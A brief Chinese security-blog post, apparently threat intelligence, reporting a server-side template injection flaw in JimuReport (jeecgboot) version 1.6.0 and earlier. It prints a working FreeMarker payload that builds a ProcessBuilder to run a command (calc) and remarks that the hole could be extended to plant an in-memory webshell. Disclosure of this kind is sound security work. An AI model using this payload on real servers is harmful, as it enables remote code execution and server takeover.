Quan


WEB安全 内网安全 终端对抗 威胁情报
威胁情报
jeecgboot积木报表系统jimureport SSTI

1.漏洞描述
jimureport ≤ v1.6.0 具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码,控制服务器权限。
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start ()}
任意代码执行,应该也能扩充成注入内存马等操作。
具体操作流程,触发点可以查看原文


https://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247488121&idx=1&sn=f5f35b0f729ec892f5cc180e1a2815f3